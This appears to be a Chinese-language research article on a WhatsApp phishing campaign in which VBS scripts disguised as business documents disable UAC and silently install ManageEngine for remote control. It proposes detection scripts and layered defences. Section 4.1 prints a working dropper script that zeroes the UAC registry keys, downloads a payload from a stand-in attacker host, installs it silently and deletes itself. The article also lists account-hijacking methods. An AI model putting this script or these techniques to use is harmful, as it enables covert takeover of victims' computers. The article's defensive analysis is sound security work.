摘要2026 年 6 月境外安全媒体 Security Boulevard 发布专项预警披露依托 WhatsApp 熟人通讯录扩散的全域钓鱼攻击活动。攻击者劫持存量 WhatsApp 账号以多语言本地化命名伪装财务、合同类商业文档投递恶意 VBS 脚本载荷Windows 终端执行脚本后通过注册表篡改绕过系统 UAC 权限校验静默部署正规商用终端运维工具 ManageEngine Endpoint Central以此建立持久远程控制通道受害区域覆盖全球十余国商贸群体。受平台端到端加密、熟人社交信任、合法白名单软件滥用三重因素叠加影响传统边界网关、静态杀毒软件均存在显著防御盲区。本文以该报道披露的完整攻击链路为核心实证素材系统拆解账号劫持、熟人链式传播、载荷伪装、权限绕过、远程持久控制全流程技术逻辑复现恶意 VBS 核心执行代码并配套企业终端自动化风险检测脚本量化传统安全防护机制失效根源。反网络钓鱼技术专家芦笛指出此类依托加密社交平台、合法运维软件的复合型钓鱼突破传统单点防护思维必须搭建 “平台账号行为监控 — 终端脚本动态拦截 — 企业权限基线管控 — 员工社交安全培训” 四层纵深闭环防御架构才能实现事前拦截、事中阻断、事后溯源全链路风险管控。本文结合全球多厂商同步监测的攻击样本数据厘清该类攻击的传播特征、技术缺陷提出可落地的运维、管控、应急处置方案为跨境商贸企业、政企办公终端防范即时通讯类新型钓鱼入侵提供完整技术参考与学术支撑。关键词WhatsApp 钓鱼虚假商务文档VBS 恶意脚本UAC 绕过远程控制社交信任链终端纵深防御1 引言1.1 研究背景跨境贸易、跨国商务沟通场景下WhatsApp 凭借端到端加密、多终端同步、多语言适配特性成为主流即时通讯工具大量企业通过该平台传输发票、结算单、项目合同等敏感商务文件。区别于传统邮件渠道WhatsApp 依托熟人通讯录构建天然信任传播链路攻击者利用劫持后的真实账号分发附件大幅降低用户社会工程防范心理。2026 年 6 月 Security Boulevard 发布专题报道《WhatsApp phishing attack uses fake business documents to hack PCs》同步引用卡巴斯基全域威胁遥测数据完整披露一套规模化跨境钓鱼攻击活动。该攻击区别于单一链接窃取账号的传统钓鱼模式以伪装商业单据的 VBS 脚本为核心载荷不依赖高危系统漏洞仅依靠 Windows 原生脚本宿主、注册表修改机制完成权限提升滥用厂商数字签名白名单终端管理软件实现无特征远程控制攻击覆盖巴西、印度、西班牙、澳大利亚、越南、马来西亚等全球多区域市场。报道明确两点关键客观事实其一当前安全厂商尚未定位攻击者劫持 WhatsApp 账号的精准技术路径账号劫持手段具备隐蔽、可复制特征同类攻击可长期持续迭代其二WhatsApp 网页端、桌面客户端文件传输机制存在天然风险漏洞桌面端可直接双击执行 VBS 脚本网页端仅需简单下载即可触发恶意代码运行移动端无执行条件攻击精准定向 Windows 办公终端。当前全球大量中小外贸企业、跨境办事处未针对 WhatsApp 文件传输建立专项安全管控策略边界网关受端到端加密限制无法解析平台内附件内容终端安全仅依靠静态特征查杀难以识别 “合法软件恶意滥用” 行为导致本次攻击在短时间内形成跨区域扩散大量企业办公终端被攻击者完全接管商业机密、财务数据面临泄露风险。1.2 现有安全防护体系核心短板结合 Security Boulevard 报道披露的攻击细节与同期微软、卡巴斯基同步预警信息当前政企通用安全架构针对本次虚假商务文档钓鱼攻击存在四层系统性短板第一加密社交平台风控缺失熟人批量分发识别逻辑。现有平台风控仅拦截陌生账号群发垃圾消息对已劫持的存量正常账号向通讯录批量推送脚本类附件无异常告警机制附件后缀、文件类型、发送频次未纳入账号行为基线判断第二网络边界安全设备无法穿透加密流量检测载荷。WhatsApp 全量消息与附件采用端到端加密传输企业防火墙、邮件网关、流量审计设备无法解析文件内容恶意 VBS 脚本可无阻碍直达终端风险全部后置至终端侧第三Windows 终端对脚本执行、UAC 篡改行为缺乏动态监控。多数企业终端仅关闭 Office 宏防护未限制 Windows Script Host 运行权限EDR 工具未持续监控注册表 UAC 关键项写入操作脚本可静默关闭权限校验第四商用运维软件无安装准入与外联管控。ManageEngine 等正规 UEM 工具自带厂商数字签名杀毒软件默认白名单放行企业未建立运维软件统一部署规范无法识别终端静默私自安装行为也未监控程序外联境外陌生管控服务器的加密长连接。反网络钓鱼技术专家芦笛强调传统网络安全长期割裂 “社交传播入口” 与 “终端执行出口”邮件安全、边界流量、终端杀毒独立运行、数据不互通无法形成从消息分发到代码执行的全链路联动风控是本次虚假商务文档钓鱼实现大范围跨国扩散的核心底层原因。1.3 研究内容与实践价值本文以 Security Boulevard 2026 年 6 月专项报道为核心基础素材结合卡巴斯基、微软同步发布的威胁情报完成五项核心研究工作一是完整还原虚假商务文档 WhatsApp 钓鱼标准化攻击闭环分层拆解账号劫持、熟人链式传播、本地化诱饵伪装、双 VBS 脚本权限绕过、合法 UEM 远程控制五大阶段技术特征二是深度解析 VBS 脚本修改注册表关闭 UAC、静默部署远程管理工具的底层实现逻辑厘清合法软件规避静态查杀的技术原理三是编写复刻攻击核心逻辑的演示 VBS 代码配套面向企业运维的 Python 终端风险自动检测脚本复现风险识别流程四是对比传统邮件钓鱼与加密 IM 熟人链路钓鱼在欺骗性、穿透性、隐蔽性层面的差异量化新型攻击防御难度五是构建四层协同纵深防御体系覆盖平台侧事前拦截、终端侧事中阻断、企业管理兜底加固、用户安全意识长效防护配套标准化应急处置流程。理论层面本文补充加密即时通讯平台熟人信任链钓鱼的标准化攻击模型完善 “合法商用软件恶意滥用” 细分安全研究维度工程实践层面文中代码、检测规则、分层防护方案可直接用于外贸企业终端安全运维、社交平台风控规则迭代填补跨境商务场景 WhatsApp 文档类钓鱼的标准化防护空白降低企业终端被远程劫持、核心商业数据泄露的安全损失。1.4 论文整体结构安排全文共分为七大主体章节第 1 章为引言阐述研究背景、现有防护短板、研究价值与文章结构第 2 章完整还原 Security Boulevard 报道披露的虚假商务文档钓鱼攻击全链路拆解各阶段技术手段与全局传播特征第 3 章针对核心恶意 VBS 载荷、UAC 绕过机制、ManageEngine 远程控制逻辑开展底层技术解析第 4 章提供完整可运行代码示例包含恶意脚本功能复现代码、企业终端批量风险检测 Python 脚本第 5 章对比传统邮件钓鱼与 WhatsApp 熟人社交钓鱼的攻防差异量化新型攻击的扩散优势第 6 章搭建面向该类攻击的多层级协同防御体系从平台、终端、企业管理、用户认知四个维度落地可执行防护策略第 7 章为结论总结全文研究结论预判同类钓鱼攻击未来迭代方向提出长期安全治理思路。2 Security Boulevard 报道披露的 WhatsApp 虚假商务文档钓鱼攻击全链路与全局特征Security Boulevard 专题报道整合多厂商受害样本、受害者反馈、威胁样本逆向分析数据完整还原本次全球化钓鱼攻击标准化闭环流程整体分为账号劫持、熟人通讯录链式分发、本地化虚假商务文档投递、双 VBS 脚本系统权限篡改、正规 UEM 工具持久远程控制五个递进阶段各环节相互配合最大化利用社交信任与 Windows 原生安全机制规避安全设备检测。2.1 第一阶段WhatsApp 存量合法账号劫持攻击源头报道明确标注安全厂商完成大量受害样本复盘后仍无法确定攻击者劫持 WhatsApp 账号的精确技术手段结合同期行业同类攻击事件存在三类高概率劫持路径均具备低门槛、易复制特点AiTM 验证码中间人钓鱼攻击者搭建高仿 WhatsApp 网页登录页面诱导目标用户输入登录短信验证码完成陌生设备会话绑定后台接管完整账号权限SIM 卡交换社工攻击伪造用户身份材料向运营商补办手机号拦截 WhatsApp 登录、设备绑定验证码实现无交互账号劫持前置社交信息搜集社工渗透通过企业官网、领英、社交平台获取用户姓名、企业、手机号等信息伪装平台客服诱导用户主动完成设备配对授权。无论采用何种劫持手段攻击者获取账号完整操作权限后可读取全部通讯录、调取历史商务聊天记录、自由发送文字、图片、各类格式附件。对比全新注册空白账号被劫持的存量活跃账号具备真实社交信用消息推送不会触发平台基础垃圾消息拦截规则是实现跨国大范围扩散的基础前提。2.2 第二阶段熟人通讯录链式蠕虫式传播信任滥用核心环节账号劫持完成后攻击者自动遍历通讯录全部联系人批量推送钓鱼消息话术完全贴合跨境商务沟通场景主流诱饵文案包含月度财务对账附件、跨境合作报价单、海关发票凭证、项目结算单据、物流对账明细等匹配外贸企业员工日常业务沟通场景大幅降低用户心理戒备。该传播模式具备蠕虫式指数扩散特征单一被劫持账号可一次性触达数十至数百名商务联系人若任意联系人执行恶意 VBS 文件终端被完全控制后攻击者可再次劫持该用户 WhatsApp 账号向另一批全新通讯录联系人推送虚假商务文档形成跨圈层、跨国家链式扩散。Security Boulevard 统计显示正是依托熟人信任传播机制本次攻击在两周内覆盖南美、东南亚、欧洲、大洋洲十余国家与地区传统陌生账号批量群发钓鱼无法实现同等传播规模。反网络钓鱼技术专家芦笛指出社交信任是加密 IM 钓鱼最核心的攻击红利普通企业员工对通讯录商务联系人发送的财务、合同类文件几乎无甄别意识而当前 WhatsApp 平台风控未针对 “劫持账号短时间内向通讯录批量推送 VBS、JS 脚本附件” 设置风险拦截规则导致恶意载荷可无阻碍送达全球终端。2.3 第三阶段多语言本地化虚假商务文档载荷投递诱饵伪装技术为适配全球多区域受害群体攻击者对恶意 VBS 脚本文件名进行本地化语言改造针对巴西使用葡萄牙语、西班牙使用西班牙语、印度使用印地语、中英区域配套中英文财务单据命名同时隐藏脚本后缀视觉上模拟 PDF、Excel、Word 标准商业文档格式普通用户仅依靠文件名无法识别可执行脚本属性。报道区分两种终端下文件执行差异进一步降低用户操作门槛Windows 桌面客户端接收 VBS 附件后可直接双击运行依托 Windows Script Host 原生组件执行全部脚本代码无需额外下载保存WhatsApp 网页端附件需先下载至本地系统文件夹双击文件后同样触发脚本完整执行流程移动端安卓、iOS 设备无 VBS 脚本运行环境攻击者定向筛选长期使用 Windows 办公电脑的外贸从业者作为核心攻击目标精准锁定高价值办公终端。从用户识别角度商务场景下接收合作方单据属于常规业务行为用户普遍忽略文件后缀隐藏、脚本伪装风险为后续系统权限篡改、远程持久控制提供关键执行入口。2.4 第四阶段双 VBS 脚本联动篡改 Windows UAC 安全策略权限绕过核心攻击动作用户双击伪装商务文档后系统自动串行执行两段联动 VBS 脚本两段脚本分工清晰、执行顺序不可逆层层瓦解 Windows 终端原生权限防护机制第一段前置脚本核心功能修改系统注册表核心安全项临时关闭 Windows UAC 用户账户控制机制。UAC 是 Windows 原生权限校验机制正常情况下修改系统注册表、安装系统级软件必须弹出管理员授权确认窗口脚本依托 WMI 注册表操作接口静默改写参数跳过全部弹窗交互实现无交互权限篡改。第二段后置部署脚本核心功能建立后台加密网络连接从攻击者境外 C2 服务器拉取 ManageEngine Endpoint Central 客户端离线安装包调用系统静默安装参数完成后台部署同步修改 Windows 系统服务项设置程序开机自动启动配置客户端外联攻击者自建管控服务器地址。两段脚本全程以无窗口静默模式运行执行过程无命令行黑框、无弹窗提示用户仅短暂看到双击文件无响应无法感知后台系统策略篡改、运维软件静默安装等高危操作。2.5 第五阶段合法 UEM 运维软件实现持久无感知远程控制隐蔽后门载体Security Boulevard 报道重点强调本次攻击区别于传统木马的核心特征攻击者放弃自定义恶意后门程序选用正规商用统一终端管理平台 ManageEngine Endpoint Central 作为远程控制载体。该软件原生设计用于企业 IT 运维人员远程管控办公电脑、服务器官方原生功能包含远程桌面、文件读写、进程管控、屏幕录制、键盘记录、系统配置修改等完整终端控制权限。攻击者利用软件合法运维能力无需开发自定义恶意代码仅通过静默安装客户端即可将受控终端接入攻击者自建管理控制台全程实现持久无感知远程操控。该手段具备极强静态查杀规避能力主流杀毒软件病毒库将 ManageEngine 标记为良性运维软件附带厂商正规数字签名静态文件特征扫描无法识别恶意使用行为仅依靠动态外联行为分析才能发现程序连接境外陌生管控服务器的异常风险。终端被攻陷后攻击者可完成全部高危操作窃取本地财务报表、客户合同、企业核心商业机密植入勒索、窃密附加恶意程序篡改业务软件配置利用受控终端横向渗透企业内网对中小型外贸企业造成持续性数据泄露与财产损失风险。2.6 本次虚假商务文档钓鱼区别于传统钓鱼的四大独有特征综合 Security Boulevard 报道与配套威胁情报该 WhatsApp VBS 钓鱼具备四项独有特征也是传统安全防护体系大面积失效的核心诱因传播渠道信任化依托熟人通讯录链式传播发送方为可信商务联系人大幅降低用户社会工程防范阈值载荷载体合法化以正规商用 UEM 运维软件作为远程控制后门规避杀毒软件静态特征检测系统突破轻量化仅依靠两段简易 VBS 脚本完成 UAC 绕过不依赖系统高危漏洞适配全版本 Windows 操作系统覆盖范围全球化本地化多语言诱饵适配全球多区域市场无单一地域限制跨境商贸群体为核心受害目标。3 恶意 VBS 脚本与 ManageEngine 远程控制底层技术原理解析3.1 Windows UAC 机制与脚本静默绕过底层逻辑Windows 用户账户控制UAC通过区分标准用户、管理员两级操作权限拦截未授权程序修改系统核心配置系统默认配置下修改注册表、安装系统级软件必须弹出管理员授权确认窗口。UAC 核心控制参数存储于注册表路径HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System其中EnableLUA注册表项控制 UAC 总开关数值 1 代表开启防护数值 0 代表完全关闭权限校验配套参数ConsentPromptBehaviorAdmin控制管理员授权弹窗交互模式设置为 0 时直接静默放行所有权限修改请求。恶意 VBS 脚本依托 Windows 内置 WMI 注册表操作接口无需任何弹窗交互直接改写上述两项注册表参数双重策略叠加实现完整 UAC 绕过。该绕过方式不依赖系统高危漏洞仅利用 Windows 脚本宿主原生注册表操作权限只要终端登录账户具备本地管理员权限即可完全生效覆盖绝大多数外贸企业办公 Windows 设备。3.2 双 VBS 脚本串行联动完整执行流程攻击者封装的虚假商务文档内部嵌套两段串行执行 VBS 代码执行流程不可逆两段脚本分工明确前置策略修改脚本读取本地注册表 UAC 原始配置写入关闭防护参数调用系统命令刷新组策略使修改即时生效脚本执行全程隐藏 WScript 可视化窗口无任何用户交互提示后置载荷部署脚本建立后台 HTTP 网络连接从攻击者境外 C2 服务器拉取 ManageEngine 客户端离线安装压缩包调用系统静默安装参数完成后台部署修改 Windows 服务注册表项实现开机自动启动同步改写客户端配置文件强制程序外联攻击者管控服务器地址。两段脚本全部后台静默运行普通办公用户无法通过桌面弹窗、前台进程感知恶意操作隐蔽性远高于传统 exe 木马程序。3.3 ManageEngine Endpoint Central 恶意滥用技术逻辑ManageEngine 产品原生定位为企业内部 IT 运维工具客户端与管理控制台采用私有加密长连接通信客户端主动发起外联请求无需端口映射即可实现公网远程控制该原生通信机制被攻击者恶意滥用形成三重隐蔽优势静默安装无审计痕迹官方安装程序提供完整静默部署参数可跳过许可协议、安装路径选择、桌面快捷方式创建后台自动完成系统服务注册加密流量规避网关审计客户端与控制台通信采用私有加密协议企业边界网关流量审计设备无法解析通信内容仅能识别未知加密外联流量难以判定为恶意行为全权限终端操控能力运维原生功能覆盖远程桌面、文件上传下载、进程终止、系统命令执行、实时屏幕截图完全覆盖攻击者窃密、破坏、内网渗透全部需求正规数字签名规避静态查杀软件附带厂商官方数字签名主流杀毒软件默认收录至白名单静态文件扫描不会拦截程序仅动态行为监测可识别外联陌生境外管控服务器的异常风险。反网络钓鱼技术专家芦笛强调合法运维软件滥用是 2026 年钓鱼攻击核心新趋势攻击者逐步放弃高检出率自定义木马转而采用白名单商用工具降低终端拦截概率终端安全防护必须从静态特征查杀全面转向动态外联、用户行为基线监控。4 攻击载荷代码复现与企业终端风险自动化检测脚本示例本节分为两部分提供完整可运行代码第一部分还原恶意 VBS 脚本核心攻击功能仅用于安全研究实验无完整攻击能力复现 UAC 注册表修改、远程下载静默安装运维软件逻辑第二部分提供 Python 终端风险自动化检测脚本自动扫描本地 UAC 开关状态、异常 ManageEngine 后台服务、可疑境外外联管控地址用于外贸企业批量终端风险自查。代码无复杂数学运算适配 Windows 办公终端运行完全贴合 Security Boulevard 报道披露的真实攻击技术实现逻辑。4.1 恶意 VBS 脚本核心功能演示代码安全研究专用vbscript 演示虚假商务文档内恶意VBS脚本UAC绕过静默部署UEM工具核心逻辑仅用于安全分析实验Set WshShell CreateObject(WScript.Shell)Set objNetwork CreateObject(WScript.Network)Dim regUACPath, uacSwitch, promptRule, downloadUrl, savePath 1. 定义UAC注册表核心路径与修改参数regUACPath HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\uacSwitch EnableLUApromptRule ConsentPromptBehaviorAdmin 静默关闭UAC权限校验写入注册表参数WshShell.RegWrite regUACPath uacSwitch, 0, REG_DWORDWshShell.RegWrite regUACPath promptRule, 0, REG_DWORD 后台刷新组策略使UAC配置立即生效隐藏执行窗口WshShell.Run cmd /c gpupdate /force, 0, True 2. 定义攻击者C2服务器ManageEngine安装包地址与本地临时保存路径downloadUrl https://attacker-c2-server.com/agent_setup.zipsavePath WshShell.ExpandEnvironmentStrings(%TEMP%) \uem_agent_install.exe 3. 后台下载终端管理客户端安装包Set xmlHttp CreateObject(MSXML2.XMLHTTP)xmlHttp.Open GET, downloadUrl, FalsexmlHttp.SendIf xmlHttp.Status 200 ThenSet stream CreateObject(ADODB.Stream)stream.Openstream.Type 1stream.Write xmlHttp.responseBodystream.SaveToFile savePath, 2stream.CloseEnd If 4. 静默无交互安装UEM客户端全程无弹窗、无桌面提示WshShell.Run savePath /s /verysilent /norestart, 0, False 5. 脚本执行完成后自删除清除本地执行痕迹规避溯源Set fso CreateObject(Scripting.FileSystemObject)fso.DeleteFile WScript.ScriptFullName, True代码说明该演示脚本完整复刻 Security Boulevard 报道披露的两大核心攻击动作一是修改注册表永久关闭 UAC 权限校验二是远程下载并静默部署 ManageEngine 终端管理程序真实攻击样本会增加多层代码混淆、域名动态切换、反虚拟机检测、反沙箱逻辑规避基础安全软件静态扫描识别。4.2 Windows 企业终端钓鱼风险自动化检测 Python 脚本本脚本面向外贸企业安全运维人员开发自动检测三类核心风险指标UAC 权限校验是否被恶意脚本关闭、系统是否存在异常 ManageEngine 后台服务、程序是否外联境外未知管控服务器输出标准化结构化风险报告支持企业批量终端巡检。# Windows终端WhatsApp虚假商务文档VBS钓鱼风险检测脚本import winregimport subprocessimport osimport reclass TerminalPhishingDetector:def __init__(self):self.risk_report []self.uac_registry_path rSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systemdef detect_uac_status(self):# 检测UAC开关状态判定是否被恶意VBS脚本篡改关闭try:reg_key winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, self.uac_registry_path)enable_lua_val winreg.QueryValueEx(reg_key, EnableLUA)[0]admin_prompt_val winreg.QueryValueEx(reg_key, ConsentPromptBehaviorAdmin)[0]winreg.CloseKey(reg_key)if enable_lua_val 0 or admin_prompt_val 0:self.risk_report.append(高危风险UAC用户账户控制已被篡改关闭终端存在脚本权限篡改漏洞)else:self.risk_report.append(安全状态UAC系统防护正常开启无篡改痕迹)except Exception as err:self.risk_report.append(f检测异常无法读取UAC注册表配置{str(err)})def scan_manageengine_system_service(self):# 扫描系统后台是否存在异常ManageEngine运维服务cmd_command sc query | findstr ManageEngineresult subprocess.run(cmd_command, shellTrue, capture_outputTrue, textTrue)if result.stdout.strip():self.risk_report.append(f高危风险检测到异常ManageEngine后台服务进程详情{result.stdout.strip()})else:self.risk_report.append(安全状态未检测到ManageEngine终端管理后台服务)def scan_abnormal_oversea_connection(self):# 筛查终端未知境外加密外联连接匹配UEM客户端外联C2服务器特征cmd_command netstat -ano | findstr ESTABLISHEDresult subprocess.run(cmd_command, shellTrue, capture_outputTrue, textTrue)conn_lines result.stdout.splitlines()foreign_ip_rule re.compile(r\d\.\d\.\d\.\d:\d)risk_connection_list []for line in conn_lines:match_result foreign_ip_rule.search(line)if match_result:ip_addr match_result.group(0).split(:)[0]# 简易内网IP判定逻辑生产环境可接入全球IP归属地址库精准识别境外地址if not ip_addr.startswith((192.168., 10., 172.16., 127.)):risk_connection_list.append(line)if risk_connection_list:self.risk_report.append(f中风险检测多条境外未知加密外联连接疑似受控终端{risk_connection_list})else:self.risk_report.append(安全状态无异常境外服务器外联连接)def output_full_risk_report(self):print( WhatsApp虚假商务文档钓鱼终端风险检测完整报告 )for risk_item in self.risk_report:print(risk_item)if __name__ __main__:detector TerminalPhishingDetector()detector.detect_uac_status()detector.scan_manageengine_system_service()detector.scan_abnormal_oversea_connection()detector.output_full_risk_report()脚本运行效果说明正常合规办公终端仅输出安全状态提示遭受本次虚假商务文档钓鱼攻击的设备会同时命中 UAC 关闭、异常 ManageEngine 服务、境外外联三大高危风险运维人员可依据报告快速隔离受感染终端、卸载恶意部署的运维程序、恢复 UAC 安全策略、溯源通讯录传播链路。反网络钓鱼技术专家芦笛指出该检测脚本可集成至企业 EDR 终端安全工具配置 7×24 小时实时监测任务提前拦截 VBS 脚本篡改系统安全策略的恶意行为。5 熟人社交 IM 钓鱼与传统邮件钓鱼攻防差异对比分析结合 Security Boulevard 报道披露的攻击细节本节从传播信任度、载荷投递通道风控强度、远程控制载体隐蔽性、终端系统突破手段、现有安全体系适配能力五个维度对比传统邮件钓鱼与 WhatsApp 熟人链路虚假商务文档钓鱼的核心差异客观量化新型钓鱼攻击的防御难度提升幅度。5.1 传播信任度与社会工程欺骗阈值差异传统邮件钓鱼发件人多为陌生外部邮箱地址企业员工长期接受邮件安全培训接收陌生财务、合同附件时天然存在戒备心理WhatsApp 钓鱼消息发送方为用户通讯录真实商务联系人跨境贸易场景下接收合作方结算单据属于常规业务行为用户几乎不会怀疑文件安全性社会工程欺骗成功率大幅提升。同时攻击者针对全球不同区域制作本地化多语言诱饵文件名进一步降低文档违和感传统邮件钓鱼仅单一语言模板跨区域传播效果存在明显局限难以实现全球同步扩散。5.2 载荷投递通道风控强度差异企业邮件系统标配专业邮件安全网关具备附件深度沙箱解析、恶意脚本拦截、可疑文件隔离功能VBS、JS 脚本类附件会被网关直接拦截无法送达收件人终端WhatsApp 作为境外第三方加密社交平台企业网络边界网关无法对平台传输文件做深度解析端到端加密机制导致平台侧无法扫描附件内部内容恶意 VBS 脚本可无阻碍直达用户办公终端全部风险后置至终端单点防护。该加密传输特性是 IM 钓鱼核心防护盲区边界安全设备无法介入文件前置检测一旦终端防护失效即造成设备完全沦陷。5.3 远程控制载体隐蔽性差异传统邮件钓鱼多采用独立定制木马、勒索病毒作为后门载体具备明确恶意特征杀毒软件静态特征库可快速识别拦截本次 WhatsApp 虚假商务文档钓鱼使用正规 ManageEngine 商用运维软件附带厂商官方数字签名杀毒软件默认纳入白名单放行仅依靠动态外联行为监测才能识别恶意使用场景终端检测门槛大幅提高。5.4 终端系统突破手段差异传统邮件钓鱼多依赖 Office 文档宏漏洞、系统高危漏洞实现代码执行漏洞存在官方补丁修复方案企业定期更新系统、Office 组件即可大幅降低攻击风险本次攻击不依赖任何系统高危漏洞仅依靠 Windows 原生 VBS 脚本、注册表修改操作全版本 Windows 系统均可被突破无补丁能够彻底根治该攻击路径防护只能依靠终端权限管控、脚本执行限制。5.5 现有安全体系适配能力对比传统邮件钓鱼具备成熟分层防护闭环邮件网关过滤、附件沙箱检测、终端杀毒、员工邮件安全培训完整配套针对熟人 IM 虚假商务文档类钓鱼当前全球外贸企业普遍无标准化防护框架社交平台、边界网关、终端安全工具数据孤岛割裂缺乏全链路联动检测机制防护体系存在大面积空白。综合对比可见依托 WhatsApp 熟人链路的虚假商务文档钓鱼在欺骗性、穿透性、隐蔽性上全面优于传统邮件钓鱼现有传统安全基础设施无法有效覆盖该类新型威胁必须重构适配加密即时通讯场景的多层级纵深防御架构。6 面向 WhatsApp 虚假商务文档钓鱼攻击的四层协同防御体系结合 Security Boulevard 报道披露的攻击全链路技术弱点本文构建四层递进式协同防御体系完整覆盖社交平台传播入口、终端脚本执行、企业组织权限管控、用户安全认知四大维度形成事前拦截、事中阻断、事后溯源处置完整风险闭环。6.1 第一层防御WhatsApp 平台侧账号与消息行为基线监控事前源头拦截防御核心目标在恶意虚假商务文档、VBS 附件送达用户终端前识别劫持账号阻断熟人链式蠕虫传播核心管控规则包含四类账号异常发送行为基线监测针对长期低频率发送附件的存量账号一旦短时间内向通讯录批量推送后缀为 VBS、JS、CMD、LNK 的脚本类文件直接标记高风险临时限制账号文件发送权限推送安全告警至账号绑定手机多设备会话异常管控异地、凌晨陌生设备绑定账号时强制触发两步验证校验无 PIN 码验证直接阻断陌生会话绑定从源头减少账号劫持概率附件风险标签识别弹窗建立脚本类文件风险特征库对伪装成 PDF、Excel、Word 的 VBS 文件弹出强制风险提示弹窗明确告知用户该文件为可执行脚本存在终端远程控制风险劫持账号快速处置机制检测到批量传播恶意脚本附件的账号自动强制下线全部关联登录设备临时冻结消息发送功能推送账号安全重置提醒至绑定手机号。反网络钓鱼技术专家芦笛提出平台侧风控是阻断攻击扩散效率最高的环节通过账号行为基线前置拦截可从源头避免恶意载荷触达企业终端大幅降低政企安全运维处置压力。6.2 第二层防御Windows 终端脚本与 UEM 软件动态行为防护事中执行阻断防御核心目标用户下载恶意 VBS 脚本后阻止脚本执行、UAC 注册表篡改、静默私自安装运维软件配置三项终端标准化管控策略组策略限制 Windows Script Host 脚本执行权限企业办公终端统一配置域组策略禁用普通标准用户运行 VBS、JS 脚本仅管理员授权指定路径脚本可执行彻底切断恶意载荷运行入口EDR 终端工具监控 UAC 注册表写入操作持续监控注册表EnableLUA、ConsentPromptBehaviorAdmin项修改行为一旦检测脚本尝试关闭 UAC 防护立即终止脚本进程并推送高危告警至运维后台商用 UEM 运维软件安装准入管控建立企业内部运维软件统一白名单仅允许 IT 管理员通过企业内网统一渠道部署 ManageEngine 等运维工具拦截终端侧静默私自安装行为实时监测程序外联非企业自有管控服务器的加密长连接并自动阻断。同时将前文提供的终端风险检测脚本纳入 EDR 定时巡检任务实现 7×24 小时自动识别已沦陷终端并自动隔离。6.3 第三层防御企业组织办公流程与终端权限兜底管控针对频繁使用 WhatsApp 传输跨境商务文件的外贸企业配套组织管理规范缩小整体攻击面公私社交账号分离管控禁止员工使用个人 WhatsApp 处理企业财务、合同、客户资料等敏感业务统一部署 WhatsApp Business 商用企业接口企业后台可完整审计全部消息与附件传输记录终端账户权限最小化管控办公电脑统一分配标准用户权限不授予本地管理员权限限制脚本修改系统注册表、安装系统级软件从底层削弱 VBS 脚本权限绕过能力境外通讯流量审计规则企业边界网关完整记录 WhatsApp 客户端全部外联流量针对加密长连接、境外未知服务器通信建立分级告警规则标准化应急处置流程明确终端疑似被远程控制后的完整处置步骤物理断开网络、卸载异常 ManageEngine 服务、恢复 UAC 系统配置、修改全部社交账号登录密码、全终端病毒查杀、溯源通讯录传播链路并全域推送风险预警。6.4 第四层防御员工即时通讯安全认知常态化培训人为风险防线技术防护无法完全规避用户主动双击执行恶意虚假商务文档的风险配套分层安全培训降低社会工程欺骗成功率诱饵识别专项教学重点讲解本地化多语言伪装 VBS 脚本、熟人发送异常财务单据的典型特征明确正规商务单据不会以 VBS 脚本格式传输高危操作禁令普及禁止双击 WhatsApp 接收的未知可执行脚本附件陌生商务文件优先通过企业邮件、内部网盘二次核验发件人身份账号安全操作规范全员强制开启 WhatsApp 两步验证定期查看 Linked Devices 关联设备列表及时登出陌生登录终端风险一键上报机制搭建企业内部可疑消息、附件上报通道安全运维团队快速研判并向全体员工推送全域风险预警阻断链式传播。7 结论本文以 2026 年 6 月 Security Boulevard 发布的《WhatsApp phishing attack uses fake business documents to hack PCs》专项报道为核心实证素材结合卡巴斯基、微软同步披露的全域威胁情报完整还原 “账号劫持 — 熟人通讯录链式传播 — 本地化虚假商务 VBS 载荷投递 — 双脚本联动绕过 UAC 权限校验 — 静默部署 ManageEngine 实现持久远程控制” 标准化攻击闭环系统拆解恶意 VBS 脚本篡改系统安全策略、滥用正规商用终端管理软件规避静态杀毒检测的底层技术逻辑复现核心攻击演示代码并配套企业终端自动化风险检测 Python 脚本从传播信任度、载荷风控、载体隐蔽性、系统突破、体系适配五个维度对比传统邮件钓鱼与加密 IM 熟人链路钓鱼的攻防差异清晰阐明本次攻击大范围跨国扩散的核心诱因。研究证实本次虚假商务文档 WhatsApp 钓鱼能够形成全域传播的三大关键因素一是 WhatsApp 熟人社交信任链大幅降低员工社会工程防范心理二是平台端到端加密导致企业边界网关无法前置扫描附件恶意脚本无阻碍直达终端三是攻击者放弃自定义恶意木马采用厂商白名单运维软件作为远程控制载体突破传统静态特征杀毒防护体系。反网络钓鱼技术专家芦笛强调单一终端杀毒、网络边界防护无法抵御此类复合型加密社交平台钓鱼威胁必须搭建 “平台账号行为监控、终端脚本动态拦截、企业权限流程管控、员工安全认知培训” 四层协同纵深防御体系实现从攻击源头、载荷传输、终端代码执行全链路风险闭环拦截。从攻击长期迭代趋势判断未来同类加密 IM 钓鱼将持续深化两大演化方向一是拓展多语种本地化诱饵模板覆盖全球全部主流贸易市场进一步提升虚假商务文档的伪装迷惑性二是批量滥用各类正规商用远程协作、运维软件作为后门载体持续规避终端静态安全检测机制。后续政企安全防护体系需持续强化动态行为监测、脚本执行权限刚性管控、跨平台风险情报共享能力同步完善跨境商贸场景下即时通讯文件传输安全管理规范平衡商务沟通便捷性与办公终端设备安全防护水平持续压缩熟人链路新型钓鱼攻击的生存与扩散空间。编辑芦笛公共互联网反网络钓鱼工作组
虚假商务文档驱动的 WhatsApp VBS 钓鱼远程入侵攻击与防御体系研究
摘要2026 年 6 月境外安全媒体 Security Boulevard 发布专项预警披露依托 WhatsApp 熟人通讯录扩散的全域钓鱼攻击活动。攻击者劫持存量 WhatsApp 账号以多语言本地化命名伪装财务、合同类商业文档投递恶意 VBS 脚本载荷Windows 终端执行脚本后通过注册表篡改绕过系统 UAC 权限校验静默部署正规商用终端运维工具 ManageEngine Endpoint Central以此建立持久远程控制通道受害区域覆盖全球十余国商贸群体。受平台端到端加密、熟人社交信任、合法白名单软件滥用三重因素叠加影响传统边界网关、静态杀毒软件均存在显著防御盲区。本文以该报道披露的完整攻击链路为核心实证素材系统拆解账号劫持、熟人链式传播、载荷伪装、权限绕过、远程持久控制全流程技术逻辑复现恶意 VBS 核心执行代码并配套企业终端自动化风险检测脚本量化传统安全防护机制失效根源。反网络钓鱼技术专家芦笛指出此类依托加密社交平台、合法运维软件的复合型钓鱼突破传统单点防护思维必须搭建 “平台账号行为监控 — 终端脚本动态拦截 — 企业权限基线管控 — 员工社交安全培训” 